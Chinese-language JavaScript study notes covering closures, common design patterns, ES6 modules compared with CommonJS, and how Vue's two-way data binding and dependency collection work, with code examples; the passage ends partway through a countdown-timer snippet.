Sandbox中文沙箱或沙盘,Sandbox是一种虚拟的程序运行环境,用以隔离可疑软件中的病毒或者对计算机有害的行为。比如浏览器就是一个Sandbox环境,它加载并执行远程的代码,但对其加以诸多限制,比如禁止跨域请求、不允许读写本地文件等等。这个概念也会被引用至模块化开发的设计中,让各个模块能相对独立地拥有自己的执行环境而不互相干扰。

第一种比较传统的实现模块化的方式便是Namespacing。

```js
var myApp = {};
myApp.module1 = function(){};
```

通过前缀式的名称解析可以达到调用不同的模块,并且不同的模块变量环境被封装到了对应的全局变量属性中。然而这并不是真正意义上的Sandbox,这样的做法最终仍然需要暴露出一个全局变量(即myApp),这对所有的模块是透明的,埋下了全局环境被污染的隐患。

那么有没有别的方法可以将变量的作用域隔离开呢?众所周知,**JavaScript变量的作用域是函数体**,因此,利用**函数体将执行环境包裹起来便成了实现Sandbox**的一种可行方案,当然最好的方式还是iframe...

具体参考:[js的沙箱内容(掘金)][JavaScriptSandboxUrl]、[漫谈沙箱][justTalkSandboxUrl]

MDN 上面这么说:闭包是一种特殊的对象。它由两部分构成:函数,以及创建该函数的环境。环境由闭包创建时在作用域中的任何局部变量组成。

```js
function f1(){
  var n = 999
  return function f2(){
    alert(n)
  }
}
var result = f1()
result() // 999
```

上述代码里f2函数就是闭包,其实可以这样理解闭包:闭包是将函数内部与函数外部连接起来的桥梁,闭包是能够读取其他函数内部变量的函数,闭包是定义在一个函数内部的函数。

闭包注意点:

1. 闭包会使得函数中的变量都被保存在内存中,内存消耗很大
2.
闭包会在父函数外部,改变父函数内部变量的值

***常用设计模式***

参考:[js十大常用设计模式][tenDesignStylesUrl]、

**工厂模式:**解决实例化多个类似对象产生重复代码的问题,如下

```js
function CreatePerson(name,age,sex) {
    var obj = {};
    obj.name = name;
    obj.age = age;
    obj.sex = sex;
    obj.sayName = function(){
        return this.name;
    }
    return obj;
}
var p1 = new CreatePerson("longen",'28','男');
var p2 = new CreatePerson("tugenhua",'27','女');
```

单体模式:将代码组织为一个逻辑单元的手段,这个逻辑单元中的代码可以通过单一变量进行访问。

1. 可以用来划分命名空间,减少全局变量的数量。
2. 使用单体模式可以使代码组织的更为一致,使代码容易阅读和维护。
3. 可以被实例化,且只实例化一次。

```js
// 单体模式
var Singleton = function(name){
    this.name = name;
};
Singleton.prototype.getName = function(){
    return this.name;
}
// 获取实例对象
var getInstance = (function() {
    var instance = null;
    return function(name) {
        if(!instance) {
            instance = new Singleton(name);
        }
        return instance;
    }
    // getInstance是自执行函数,定义的时候就执行了
})();
// 测试单体模式的实例
var a = getInstance("aa");
var b = getInstance("bb");
console.log(a === b); // true

// 常规模式创建弹层
var createWindow = function(){
    var div = document.createElement("div");
    div.innerHTML = "我是弹窗内容";
    div.style.display = 'none';
    document.body.appendChild(div);
    return div;
};
document.getElementById("Id").onclick = function(){
    // 点击后先创建一个div元素
    var win = createWindow();
    win.style.display = "block";
}
// 常规创建弹层时,若多次点击则创建多个,若通过移除再创建则造成性能浪费

// 单例模式创建弹层
var createWindow = (function () {
    var div
    return function(){
        if(!div){
            div = document.createElement('div')
            div.innerHTML = '这是弹层内容'
            div.style.display = 'none'
            document.body.appendChild(div)
        }
        return div
    }
})()
document.getElementById("Id").onclick = function(){
    // 点击后先创建一个div元素
    var win = createWindow();
    win.style.display = "block";
}
// 我们还可以再进一步抽离,比如如果此时要创建一个iframe元素,难道要重新写一遍上面的代码?
// 因此,虽然创建具体元素的代码不同,但单例模式的代码框架是相同的,如下 var getInstance = function(fn) { var result; return function(){ // 有则返回,无则调用具体的创建代码 return result || (result = fn.call(this,arguments)); } }; // 创建div var createWindow = function(){ var div = document.createElement("div"); div.innerHTML = "我是弹窗内容"; div.style.display = 'none'; document.body.appendChild(div); return div; }; // 创建iframe var createIframe = function(){ var iframe = document.createElement("iframe"); document.body.appendChild(iframe); return iframe; }; // 测试创建div var createSingleDiv = getInstance(createWindow); document.getElementById("Id").onclick = function(){ var win = createSingleDiv(); win.style.display = "block"; }; // 测试创建iframe var createSingleIframe = getInstance(createIframe); document.getElementById("Id").onclick = function(){ var win = createSingleIframe(); win.src = "http://cnblogs.com"; }; ``` **注意iframe一些缺点:** - iframe会阻塞主页面的Onload事件; - iframe和主页面共享连接池,而浏览器对相同域的连接有限制,所以会影响页面的并行加载。 如果需要使用iframe,最好是通过javascript动态给iframe添加src属性值,这样可以可以绕开以上两个问题。 **代理模式:**代理是一个对象,它可以用来控制对本体对象的访问,它与本体对象实现了同样的接口,代理对象会把所有的调用方法传递给本体对象。 1. 代理对象可以代替本体被实例化,并使其可以被远程访问; 2. 
它还可以把本体实例化推迟到真正需要的时候;对于实例化比较费时的本体对象,或者因为尺寸比较大以至于不用时不适于保存在内存中的本体,我们可以推迟实例化该对象; 比如现在京东ceo想送给奶茶妹一个礼物,但是呢假如该ceo不好意思送,或者由于工作忙没有时间送,那么这个时候他就想委托他的经纪人去做这件事,于是我们可以使用代理模式来编写如下代码: ```js // 先申明一个奶茶妹对象 var TeaAndMilkGirl = function(name) { this.name = name; }; // 这是京东ceo先生 var Ceo = function(girl) { this.girl = girl; // 送结婚礼物 给奶茶妹 this.sendMarriageRing = function(ring) { console.log("Hi " + this.girl.name + ", ceo送你一个礼物:" + ring); } }; // 京东ceo的经纪人是代理,来代替送 var ProxyObj = function(girl){ this.girl = girl; // 经纪人代理送礼物给奶茶妹 this.sendGift = function(gift) { // 代理模式负责本体对象实例化 (new Ceo(this.girl)).sendMarriageRing(gift); } }; // 初始化 var proxy = new ProxyObj(new TeaAndMilkGirl("奶茶妹")); proxy.sendGift("结婚戒"); // Hi 奶茶妹, ceo送你一个礼物:结婚戒 ``` 上面的代理主要体现的是代理的特点1,即代理对象可以代替本体实例化,并使其可以远程控制。。。但特点2体现不明显,其实特点2就是**虚拟代理**,虚拟代理用于控制对那种创建开销很大的本体访问,他会把本体的实例化推迟到有方法调用的时候。其实类似事件循环,当事件有结果了,就去执行回调。。。 **发布订阅模式(观察者模式):**它定义了对象间的一种一对多的关系,让多个观察者对象同时监听某一个主题,当一个对象发生改变时,所有依赖于它的对象都将得到通知。 其实生活中的观察者模式比比皆是,比如很多订阅了商家的某个东西,商家来货了就通知所有的用户。。。 优点: 1. 支持简单的广播通信,当对象状态发生改变时,会自动通知已经订阅的对象 2. 发布者与订阅者耦合性降低,发布者只管发布一条消息出去即可,不用关心买家是否在意。 如何实现观察者模式: 1. 确定发布者(比如卖家) 2. 确定订阅者列表(比如哪些卖家关注了卖家) 3. 
发布消息,发布者遍历订阅者列表,依次触发里面存放的订阅者回调函数(不同的人,订阅的产品可能不同)

```js
var shoeObj = {}; // 定义发布者
shoeObj.list = []; // 缓存列表 存放订阅者回调函数

// 增加订阅者
shoeObj.listen = function(fn) {
    shoeObj.list.push(fn); // 订阅消息添加到缓存列表
}

// 发布消息
shoeObj.trigger = function(){
    for(var i = 0,fn; fn = this.list[i++];) {
        fn.apply(this,arguments);
    }
}

// 小红订阅如下消息
shoeObj.listen(function(color,size){
    console.log("颜色是:"+color);
    console.log("尺码是:"+size);
});
// 小花订阅如下消息
shoeObj.listen(function(color,size){
    console.log("再次打印颜色是:"+color);
    console.log("再次打印尺码是:"+size);
});
shoeObj.trigger("红色",40);
shoeObj.trigger("黑色",42);
```

但是有些订阅者,想只定制自己关心的产品,比如小红只关心红色鞋,不想接受黑色鞋的消息。。。因此给订阅加一个消息类型key,按类型缓存和触发对应的回调即可。。。

```js
// 增加订阅者
shoeObj.listen = function(key, fn) {
    // 如果还没有订阅过此类消息,给该类消息创建一个缓存列表
    if(!this.list[key]){
        this.list[key] = []
    }
    this.list[key].push(fn); // 订阅消息添加到缓存列表
}

// 发布消息
shoeObj.trigger = function(){
    var key = [].shift.call(arguments) // 取出消息类型
    var fns = this.list[key] // 取出该消息对应的回调函数的集合
    // 如果没有订阅过该消息的话,则返回
    if(!fns || fns.length === 0) {
        return;
    }
    for(var i = 0,fn; fn = fns[i++]; ) {
        fn.apply(this,arguments); // arguments 是发布消息时附送的参数
    }
}
```

既然发布订阅可以用于某个商品,那同样可以应用在其他场合。。。所以封装一下

```js
var event = {
    list: [],
    listen: function(key,fn) {
        if(!this.list[key]) {
            this.list[key] = [];
        }
        // 订阅的消息添加到缓存列表中
        this.list[key].push(fn);
    },
    trigger: function(){
        var key = Array.prototype.shift.call(arguments);
        var fns = this.list[key];
        // 如果没有订阅过该消息的话,则返回
        if(!fns || fns.length === 0) {
            return;
        }
        for(var i = 0,fn; fn = fns[i++];) {
            fn.apply(this,arguments);
        }
    },
    // 取消订阅
    remove: function(key, fn){
        var fns = this.list[key]
        // 如果key对应的消息没有订阅过的话,返回
        if(!fns) return false
        // 如果没有传具体的回调函数,表示需要取消key对应消息的所有订阅
        if(!fn){
            fns.length = 0
        }else{
            for(var i = fns.length-1;i>=0;i--){
                var _fn = fns[i]
                if(_fn === fn){
                    fns.splice(i,1) // 删除订阅者的回调函数
                }
            }
        }
    }
};

// 再定义一个函数,可以直接让普通对象都具有发布订阅功能
var initEvent = function(obj) {
    for(var i in event) {
        obj[i] = event[i];
    }
};
```

手写一个观察者模式:

```js
class Dep {
    constructor () {
        /* 用来存放Watcher对象的数组 */
        this.subs = [];
    }
    /* 在subs中添加一个Watcher对象 */
    addSub
(sub) { this.subs.push(sub); } /* 通知所有Watcher对象更新视图 */ notify () { this.subs.forEach((sub) => { sub.update(); }) } } ``` ***模块化、`MV*`、*** 历史上,JavaScript 一直没有模块(module)体系,无法将一个大程序拆分成互相依赖的小文件,再用简单的方法拼装起来。其他语言都有这项功能,比如 Ruby 的require、Python 的import,甚至就连 CSS 都有@import,但是 JavaScript 任何这方面的支持都没有,这对开发大型的、复杂的项目形成了巨大障碍。 在 ES6 之前,社区制定了一些模块加载方案,最主要的有 CommonJS 和 AMD 两种。前者用于服务器,后者用于浏览器。ES6 在语言标准的层面上,实现了模块功能,而且实现得相当简单,完全可以取代 CommonJS 和 AMD 规范,成为浏览器和服务器通用的模块解决方案。 ES6 模块的设计思想是尽量的静态化,使得编译时就能确定模块的依赖关系,以及输入和输出的变量。CommonJS 和 AMD 模块,都只能在运行时确定这些东西。比如,CommonJS 模块就是对象,输入时必须查找对象属性。 ```js // CommonJS模块 let { stat, exists, readFile } = require('fs'); // 等同于 let _fs = require('fs'); let stat = _fs.stat; let exists = _fs.exists; let readfile = _fs.readfile; ``` 上面代码的实质是整体加载fs模块(即加载fs的所有方法),生成一个对象(_fs),然后再从这个对象上面读取 3 个方法。这种加载称为“运行时加载”,**因为只有运行时才能得到这个对象,导致完全没办法在编译时做“静态优化”**。 **ES6 模块不是对象,而是通过export命令显式指定输出的代码,再通过import命令输入**。 ```js // ES6模块 import { stat, exists, readFile } from 'fs'; ``` 上面代码的实质是从fs模块加载 3 个方法,其他方法不加载。这种加载称为**编译时加载或者静态加载**,即 ES6 可以在编译时就完成模块加载,效率要比 CommonJS 模块的加载方式高。当然,**这也导致了没法引用 ES6 模块本身,因为它不是对象**。 ```js // 务必注意:export 命令规定的是对外的接口,必须与模块内部的变量一一对应。 // 报错,没有提供对外的接口,而直接是值 export 1; // 报错,这里通过变量输出的依然是1,1是值而不是接口 var m = 1; export m; export var m = 1; // 正确 var m = 1; export { m }; // 正确 var n = 1; export {n as m1, n as m2}; // 可以使用不同的名字加载两次 // 实质是:在接口名与模块内部变量之间,建立一一对应关系。 // 同样对于 function class同样如此 function f(){}; export f; // 报错 function f(){}; export {f}; // 正确 export function f(){}; // 正确 function foo() {} export default foo; // 正确 // 另外export语句输出的接口,与其对应的值是动态绑定关系,即通过接口,可以去到模块内部的值 export var foo = 'bar'; setTimeout(() => foo = 'bazbaz', 500); // 上面代码刚开始输出变量foo,值为bar,500毫秒后变为bazbaz // CommonJS 规范完全不同。CommonJS 模块输出的是值的缓存,不存在动态更新 // export命令可以出现在模块的任何位置,只要处于模块顶层就可以。 // 如果处于块级作用域内,就会报错,下面的import命令也是如此。 // 这是因为处于条件代码块之中,就没法做静态优化了,违背了 ES6 模块的设计初衷。 function foo() { export default 'bar' // SyntaxError } foo() // import命令输入的变量都是只读的,因为它的本质是输入接口。也就是说,不允许在加载模块的脚本里面,改写接口。 import {a} from 
'./xxx.js' a = {}; // Syntax Error : 'a' is read-only; a.foo = 'hello'; // 合法操作 // a的属性可以成功改写,并且其他模块也可以读到改写后的值。 // 不过,这种写法很难查错,建议凡是输入的变量,都当作完全只读,轻易不要改变它的属性。 // import命令具有提升效果,会提升到整个模块的头部,首先执行。 // 因此下面不会报错,因为import的执行早于foo的调用,类似变量提升 // 这种行为的本质是,import命令是编译阶段执行的,在代码运行之前。 foo(); import { foo } from 'my_module'; // 由于import是静态执行,所以不能使用表达式和变量,这些只有在运行时才能得到结果的语法结构。 // 报错 import { 'f' + 'oo' } from 'my_module'; // 报错 let module = 'my_module'; import { foo } from module; // 报错 if ( x === 1 ) { import { foo } from 'module1'; } else { import { foo } from 'module2'; } // 通过 Babel 转码,CommonJS 模块的require命令和 ES6 模块的import命令, // 可以写在同一个模块里面,但是最好不要这样做。 // 因为import在静态解析阶段执行,所以它是一个模块之中最早执行的。下面的代码可能不会得到预期结果。 require('core-js/modules/es6.symbol'); require('core-js/modules/es6.promise'); import React from 'React'; // 另外import语句是 Singleton 模式。 // 也就是同一个模块引入多次,只会执行一次,但可以重命名不同名 // export default就是输出一个叫做default的变量或方法,然后系统允许你为它取任意名字。 // modules.js function add(x, y) { return x * y; } export {add as default}; // 等同于 // export default add; // app.js import { default as foo } from 'modules'; // 等同于 // import foo from 'modules'; // 正是因为export default命令其实只是输出一个叫做default的变量,所以它后面不能跟变量声明语句。 // 正确 export var a = 1; // 正确 var a = 1; export default a; // 错误 export default var a = 1; // 同样地,因为export default命令的本质是将后面的值,赋给default变量,所以可以直接将一个值写在export default之后。 // 正确 export default 42; // 报错 export 42; // 如果想在一条import语句中,同时输入默认方法和其他接口,可以写成下面这样。 import _, { each, forEach } from 'lodash'; // 我们知道import不能动态加载模块,因此是有缺陷的 // 但现在有提案:建议引入import()函数,完成动态加载。 // import函数的参数specifier,指定所要加载的模块的位置。 // import命令能够接受什么参数,import()函数就能接受什么参数,两者区别主要是后者为动态加载。 const main = document.querySelector('main'); import(`./section-modules/${someVariable}.js`) .then(module => { module.loadPageInto(main); }) .catch(err => { main.textContent = err.message; }); // import()函数与所加载的模块没有静态连接关系,这点也是与import语句不相同。 // import()类似于 Node 的require方法,区别主要是前者是异步加载,后者是同步加载。 // 现在vue项目动态加载模块方案就是import() // 因此现在可以实现按需加载(比如点击后)、条件加载(if)、动态的模块路径 
import(f()) .then(...); // 动态的模块路径 // 浏览器加载es6模块 // 浏览器加载 ES6 模块,也使用<script>标签,但是要加入type="module"属性。 <script type="module" src="./foo.js"></script> // 浏览器对于带有type="module"的<script>,都是异步加载,不会造成堵塞浏览器, // 即等到整个页面渲染完,再执行模块脚本,等同于打开了<script>标签的defer属性。 ``` 由于 ES6 模块是编译时加载,使得静态分析成为可能。有了它,就能进一步拓宽 JavaScript 的语法,比如引入宏(macro)和类型检验(type system)这些只能靠静态分析实现的功能。 ***1、ES6 模块与 CommonJS 模块的差异*** - CommonJS 模块输出的是一个值的拷贝,ES6 模块输出的是值的引用。 - CommonJS 模块是运行时加载,ES6 模块是编译时输出接口。 第二个差异是因为 CommonJS 加载的是一个对象(即module.exports属性),该对象只有在脚本运行完才会生成。而 ES6 模块不是对象,它的对外接口只是一种静态定义,在代码静态解析阶段就会生成。 ES6 模块的运行机制与 CommonJS 不一样。JS 引擎对脚本静态分析的时候,遇到模块加载命令import,就会生成一个只读引用。等到脚本真正执行时,再根据这个只读引用,到被加载的那个模块里面去取值。换句话说,ES6 的import有点像 Unix 系统的“符号连接”,原始值变了,import加载的值也会跟着变。因此,ES6 模块是动态引用,并且不会缓存值,模块里面的变量绑定其所在的模块。 ***2、ES6 模块与 CommonJS 模块之间相互加载*** ```js // ES6加载CommonJs模块 // a.js module.exports = { foo: 'hello', bar: 'world' }; // 等同于 export default { foo: 'hello', bar: 'world' }; // import命令加载上面的模块,module.exports会被视为默认输出, // 即import命令实际上输入的是这样一个对象{ default: module.exports } ``` ***exports/import & module.exports/require区别*** 参考:[exports与export的区别][exports&exportDiffUrl] - require: node 和 es6 都支持的引入 - export / import : 只有es6 支持的导出引入 - module.exports / exports: 只有 node 支持的导出 require的使用很简单,相当于module.exports的传送门,module.exports后面跟着什么,require的结果就是什么,对象、数字、字符串、函数…再把这个require的结果赋值给某个变量。使用时,完全可以把它当成**node的一个全局函数**,参数还可以是表达式。 但import则不同,它是编译时的(require是运行时的),它不会将整个模块运行后赋值给某个变量,而是只选择import的接口进行编译,这样在性能上比require好很多。另外import导入的模块,后续对模块进行修改,再次使用模块内数据会发生变化,import建立的只是类似软连接的机制。而require则相当于将模块导入,后续再修改模块,则不会更新。 ***2、在ES模块里导入导出*** 1. export与export default均可用于导出常量、函数、文件、模块等 2. 在一个文件或模块中,export、import可以有多个,export default仅有一个 3. 通过export方式导出,在导入时要加{ },export default则不需要 4. 
export能直接导出变量表达式,export default不行。 ***MVC、MVVM*** mvvm模型,mvc模型诞生于早期,其实主要适用于view层逻辑比较简单,且大多是直接展示后台返回的代码模板,而现在的view层有大量的逻辑及频繁操作dom以及更新数据,若是再人为的操作,势必造成重复性劳作及性能问题,因此出现mvvm模型,vm自动同步v和m的变化,vue中每个实例可以理解为vm,vm.$el可以理解为v,而vm.$data可以理解为m,当v或m变化后,vm会自动同步二者。。。也就一定程度上避免了频繁的人为操作及性能问题 框架 框架分多种,每种类型的框架做的事情不尽相同,有点限于ui层面,有的限于模板层面,而vue和react提供状态到界面的映射及组件,但并没有http请求,路由,状态管理等,因此还需要配合第三方库使用。 像express和hapi.js是web框架,但vue和react也被常说成框架,但vue解释自己为js框架,而react为构建用户界面的js库,因此侧重点都是数据到界面的映射。。。而不是像express和hapi那样侧重api ***Vue、React对比*** 相同点: 1. 使用Virtual DOM 2. 提供响应式(Reactive)和组件化(Composable)的视图组件 3. 将注意力集中保持在核心库,而将其他功能诸如路由和全局状态管理交给相关的库 不同点: 1. React中一切皆JavaScript,不仅仅HTML甚至CSS都纳入到JavaScript中处理,即JSX(使用XML编写JavaScript语法糖);而Vue推荐使用模板,但Vue提供了渲染函数,甚至支持JSX。 2. React运行时性能,在React中,某个组件的状态发生变化时,它会以该组件为根,重新渲染整个组件子树(可以配置,但稍复杂)。而Vue是依赖是在渲染过程中自动追踪的。 ***Vue核心*** ***Vue之proxy、defineProperty*** ```js // obj: 要在其上定义属性的对象。 // prop: 要定义或修改的属性的名称。 // descriptor: 将被定义或修改的属性的描述符。 Object.defineProperty(obj, prop, descriptor) var obj = {}; Object.defineProperty(obj, "num", { value : 1, writable : true,//当且仅当该属性的writable为true时,value才能被赋值运算符改变。默认为 false。 enumerable : true,//当且仅当该属性的enumerable为true时,该属性才能够出现在对象的枚举属性中。默认为 false。 configurable : true//当且仅当该属性的 configurable 为 true 时,该属性描述符才能够被改变,同时该属性也能从对应的对象上被删除。默认为 false。 }); // 对象 obj 拥有属性 num,值为 1 ``` 注意:descriptor对象内的value是**数据描述符**,还可是另外一种形式:**存取描述符(get、set)**,但二者**不能同时出现** ```js var o = {}; // 创建一个新对象 // 在对象中添加一个属性与数据描述符的示例 Object.defineProperty(o, "a", { value : 37, writable : true, enumerable : true, configurable : true }); // 对象o拥有了属性a,值为37 // 在对象中添加一个属性与存取描述符的示例 var bValue; Object.defineProperty(o, "b", { get : function(){ return bValue; }, set : function(newValue){ bValue = newValue; }, enumerable : true, configurable : true }); o.b = 38; // 对象o拥有了属性b,值为38 // o.b的值现在总是与bValue相同,除非重新定义o.b // 数据描述符和存取描述符不能混合使用 Object.defineProperty(o, "conflict", { value: 0x9f91102, get: function() { return 0xdeadbeef; } }); // throws a TypeError: value appears only in data descriptors, 
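// 补充一个小示意(变量名为这里举例的假设,并非上文原码):
// 用存取描述符(get)即可实现"依赖其他属性、读取时才计算"的属性
var rect = { w: 3, h: 4 };
Object.defineProperty(rect, 'area', {
  get: function () { return this.w * this.h; },
  enumerable: true,
  configurable: true
});
console.log(rect.area); // 12
rect.w = 5;
console.log(rect.area); // 20,每次读取都会基于最新的 w、h 重新计算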
``` 使用 defineProperty 只能重定义属性的读取(get)和设置(set)行为,到了 ES6,提供了 Proxy,可以重定义更多的行为,比如 in、delete、函数调用等更多行为。 ```js // target参数表示所要拦截的目标对象 // handler参数也是一个对象,用来定制拦截行为 var proxy = new Proxy(target, handler); // 如果handler没有设置任何拦截,那就等同于直接通向原对象。 var target = {}; var handler = {}; var proxy = new Proxy(target, handler); proxy.a = 'b'; target.a // "b" // 下面是Proxy的设置和获取 var proxy = new Proxy({}, { get: function(obj, prop) { console.log('设置 get 操作') return obj[prop]; }, set: function(obj, prop, value) { console.log('设置 set 操作') obj[prop] = value; } }); proxy.time = 35; // 设置 set 操作 console.log(proxy.time); // 设置 get 操作 // 35 ``` ***手动实现v-model*** ```html <!-- 当原生的输入元素类型并不总能满足需求,因此可以使用自定义组件,要始终记住: --> <input v-model="searchText"> <!-- 等价于 --> <input v-bind:value="searchText" v-on:input="searchText = $event.target.value" > <!-- 其实就是绑定input的value作为属性searchText的值,然后监听input事件,并把$event.target.value的值传递给searchText。 --> <!-- 当用在组件上时,v-model 则会这样: --> <custom-input v-bind:value="searchText" v-on:input="searchText = $event"></custom-input> <!-- 为了让它正常工作,这个组件内的input必须: 1,将其value特性绑定到一个名为value的prop上 2,在其input事件被触发时,将新的值通过自定义的input事件抛出 --> Vue.component('custom-input', { props: ['value'], template: ` <input v-bind:value="value" v-on:input="$emit('input', $event.target.value)" > ` }) <!-- 现在v-model就应该可以在这个组件上完美地工作起来了: --> <custom-input v-model="searchText"></custom-input> 使用了v-model的组件会自动监听 input 事件,并把这个input事件所携带的值传递给v-model所绑定的属性,这样组件内部的值就给到了父组件了 ``` ***详解双向数据绑定原理*** 参考:[通俗解释双向绑定][popularReadVueTwoDirectionDataBindUrl]、[剖析vue双向绑定实现原理][vueTwoDirectionDataBindUrl]、[Vue源码详细解析(数据响应化)][vueSourceCodeAnalyzeUrl]、[Vue.js技术揭秘][vueTheroySkillUrl] 总体过程:vue.js是采用数据劫持结合发布订阅者模式的方式,通过`Object.defineProperty()`来劫持各个属性的setter,getter,在数据变动时发布消息给订阅者(也就是setter回调里,执行订阅者列表的回调函数)。 而angular.js是通过脏检查机制的对比数据是否发生变更,来决定是否更新视图,最简单的方式就是通过 setInterval() 定时轮询检测数据变动。。。当然angular在指定的事件触发时才会进入脏检查机制: - DOM事件,譬如用户输入文本,点击按钮等。( ng-click ) - XHR响应事件 ( $http ) - 浏览器Location变更事件 ( $location ) - Timer事件( $timeout , $interval ) - 执行 
$digest() 或 $apply()

1. 使得数据对象变得"可观测",需要是对象

```js
const hero = {
  health: 3000,
  IQ: 150
}
// 如果修改了上面对象的值,怎么让他告诉我们呢?
// 改写如下
let hero = {}
let val = 3000
Object.defineProperty(hero, 'health', {
  get () {
    console.log('我的health属性被读取了!')
    return val // 返回定义的val值3000
  },
  set (newVal) {
    console.log('我的health属性被修改了!')
    val = newVal
  }
})
console.log(hero.health)
// => 我的health属性被读取了!
// => 3000
hero.health = 5000
// => 我的health属性被修改了!
// => 5000
```

2. 封装一下,对一个对象进行遍历,进而都被可观测

```js
/**
 * 使一个对象转化成可观测对象
 * @param { Object } obj 对象
 * @param { String } key 对象的key
 * @param { Any } val 对象的某个key的值
 */
function defineReactive (obj, key, val) {
  Object.defineProperty(obj, key, {
    get () {
      // 触发getter
      console.log(`我的${key}属性被读取了!`)
      return val
    },
    set (newVal) {
      // 触发setter
      console.log(`我的${key}属性被修改了!`)
      val = newVal
    }
  })
}
/**
 * 把一个对象的每一项都转化成可观测对象
 * @param { Object } obj 对象
 */
function observe (obj) {
  const keys = Object.keys(obj)
  keys.forEach((key) => {
    defineReactive(obj, key, obj[key])
  })
  return obj
}
// 然后就可以直接
const hero = observe({
  health: 3000,
  IQ: 150
})
```

3. 计算属性,某个值的修改会导致另外数据的变化

```js
// 比如定义如下一个监听器
// 比如,检测hero的health属性,根据属性值的不同,type值就会不同
// 因此type就可以理解为计算属性,依赖是hero.health
watcher(hero, 'type', () => {
  return hero.health > 4000 ? '坦克' : '脆皮'
})
```

分析上面代码可以知道,监听器接受三个参数,分别是被监听的对象,被监听的属性及回调函数。。。回调函数返回一个**被监听属性的值**。。。然后抽成下面的代码

```js
/**
 * 当计算属性的值被更新时调用
 * @param { Any } val 计算属性的值
 */
function onComputedUpdate (val) {
  console.log(`我的类型是:${val}`);
}
/**
 * 观测者
 * @param { Object } obj 被观测对象
 * @param { String } key 被观测对象的key
 * @param { Function } cb 回调函数,返回"计算属性"的值
 */
function watcher (obj, key, cb) {
  Object.defineProperty(obj, key, {
    get () {
      // 执行回调,并将返回值交给onComputedUpdate执行
      const val = cb()
      onComputedUpdate(val)
      return val
    },
    set () {
      console.error('计算属性无法被赋值!')
    }
  })
}
```

现在看起来没毛病,一切都运行良好,是不是就这样结束了呢?别忘了,我们现在是通过手动读取hero.type来获取这个英雄的类型,并不是他主动告诉我们的。如果我们希望让英雄能够在health属性被修改后,第一时间主动发起通知,又该怎么做呢?这就涉及到本文的核心知识点——**依赖收集**。

4.
依赖收集, 我们知道,当一个可观测对象的属性被读写时,会触发它的getter/setter方法。换个思路,如果我们可以在可观测对象的getter/setter里面,去执行监听器里面的onComputedUpdate()方法,是不是就能够实现让对象主动发出通知的功能呢? 由于监听器内的onComputedUpdate()方法需要接收回调函数的值作为参数,而可观测对象内并没有这个回调函数,所以我们需要借助一个第三方来帮助我们把监听器和可观测对象连接起来。 这个第三方就做一件事情——收集监听器内的回调函数的值以及onComputedUpdate()方法。 现在我们把这个第三方命名为“依赖收集器”,一起来看看应该怎么写: ```js const Dep = { target: null } ``` 依赖收集器的target就是用来存放监听器里面的onComputedUpdate()方法的。定义完依赖收集器,我们回到监听器里,看看应该在什么地方把onComputedUpdate()方法赋值给Dep.target: ```js function watcher (obj, key, cb) { // 定义一个被动触发函数,当这个“被观测对象”的依赖更新时调用 const onDepUpdated = () => { const val = cb() onComputedUpdate(val) } Object.defineProperty(obj, key, { get () { Dep.target = onDepUpdated // 执行cb()的过程中会用到Dep.target, // 当cb()执行完了就重置Dep.target为null const val = cb() Dep.target = null return val }, set () { console.error('计算属性无法被赋值!') } }) } ``` 我们在监听器内部定义了一个新的onDepUpdated()方法,这个方法很简单,就是把监听器回调函数的值以及onComputedUpdate()给打包到一块,然后赋值给Dep.target。这一步非常关键,通过这样的操作,依赖收集器就获得了监听器的回调值以及onComputedUpdate()方法。作为全局变量,Dep.target理所当然的能够被可观测对象的getter/setter所使用。 重新看一下我们的watcher实例: ```js watcher(hero, 'type', () => { return hero.health > 4000 ? '坦克' : '脆皮' }) ``` 在它的回调函数中,调用了英雄的health属性,也就是触发了对应的getter函数。理清楚这一点很重要,因为接下来我们需要回到定义可观测对象的defineReactive()方法当中,对它进行改写: ```js function defineReactive (obj, key, val) { const deps = [] Object.defineProperty(obj, key, { get () { if (Dep.target && deps.indexOf(Dep.target) === -1) { deps.push(Dep.target) } return val }, set (newVal) { val = newVal deps.forEach((dep) => { dep() }) } }) } ``` 总结: 1. 首先需要通过observe观测数据,然后递归调用defineReactive执行getter/setter设定 2. 在getter中会将所有的watcher(也就是订阅者)添加进订阅者列表里deps里 3. 
在setter中,在改变值后,会遍历订阅者列表执行其中的订阅者回调函数(一般是update函数)

注意:在这个方法里面我们定义了一个空数组deps,当getter被触发的时候,就会往里面添加一个Dep.target。回到关键知识点Dep.target等于监听器的onComputedUpdate()方法,这个时候可观测对象已经和监听器捆绑到一块。任何时候当可观测对象的setter被触发时,就会调用数组中所保存的Dep.target方法,也就是自动触发监听器内部的onComputedUpdate()方法。

vue中的比较好的代码片段:

```js
// 如果是对象就遍历其属性,如果是数组则逐项递归
function touch (obj) {
  if (typeof obj === 'object'){
    if (Array.isArray(obj)) {
      for (let i = 0,l = obj.length; i < l; i++) {
        touch(obj[i])
      }
    } else {
      // 对象直接遍历,并递归
      let keys = Object.keys(obj)
      for (let key of keys) touch(obj[key])
    }
    console.log(obj)
  }
}
```

***倒计时组件***

```html
<button class="button" :class="{disabled: !canClick}" @click="countDown">{{ content }}</button>
<div>{{ finalExample }}</div>

<script>
export default {
  data() {
    return {
      content: "发送验证码",
      totalTime: 10,
      canClick: true, // 添加canClick
      msg: '时间戳',
      finalExample: ''
    };
  },
  computed: {
    myTime: {
      get: function() {
        // 时间戳不是响应式依赖,而由于计算属性被缓存了,getter并不总是被调用
        return Date.now() + this.msg;
      },
      // 若想每次访问myTime都调用getter,则需要关闭cache
      // 但务必注意,只在js里访问才会有效果
      cache: false,
    },
  },
  mounted() {
    this.timer = setInterval(() => {
      // 这样的话,就每次都从js里获取myTime,然后再渲染到页面上
      // 相当于一个迂回
      this.finalExample = this.myTime;
    }, 1000);
  },
  methods: {
    countDown() {
      // 防止同一个计时区间多次点击,若多次点击则速度会变快,因为多个定时器修改的是同一个值
      if (!this.canClick) return;
      this.canClick = false;
      // 这里是消除初始倒计时不是this.totalTime的问题
      this.content = this.totalTime + "s后重新发送";
      let clock = window.setInterval(() => {
        this.totalTime--;
        this.content = this.totalTime + "s后重新发送";
        if (this.totalTime < 0) {
          window.clearInterval(clock);
          this.content = "重新发送验证码";
          this.totalTime = 10;
          this.canClick = true; // 这里重新开启可以点击
        }
      }, 1000);
    }
  },
  beforeDestroy() {
    window.clearInterval(this.timer);
  }
};
</script>
```

```js
function dateCount() {
  // 获取现在的时间
  var date = new Date();
  // 2018的第一天
  var until = new Date('2018-01-01 00:00:00');
  // 计算时会发生隐式转换,调用valueOf()方法,转化成时间戳的形式
